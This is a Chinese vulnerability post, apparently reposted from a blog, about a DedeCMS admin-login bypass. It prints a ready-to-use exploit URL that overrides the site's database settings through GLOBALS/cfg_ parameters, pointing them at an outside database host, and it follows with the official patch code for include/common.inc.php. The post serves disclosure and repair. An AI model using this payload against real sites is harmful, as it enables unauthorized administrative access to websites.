DEDECMS爆严重安全漏洞

简要描述:

众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”

详细说明:

http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面黑底黄字上的字母改为当前的验证码,即可直接进入网站后台。



漏洞证明:

 

修复方案:

此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法:



解决办法:

找到include/common.inc.php文件,把





foreach($_REQUEST as $_k=>$_v)

{

var_dump($_k);

if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )

{

exit('Request var not allow!');

}

}



换成



//检查和注册外部提交的变量

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k=>$_v) {

CheckRequest($_k);

CheckRequest($val[$_k]);

}

} else

{

if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )

{

exit('Request var not allow!');

}

}

}

CheckRequest($_REQUEST);

原文地址:https://www.cnblogs.com/milantgh/p/3635602.html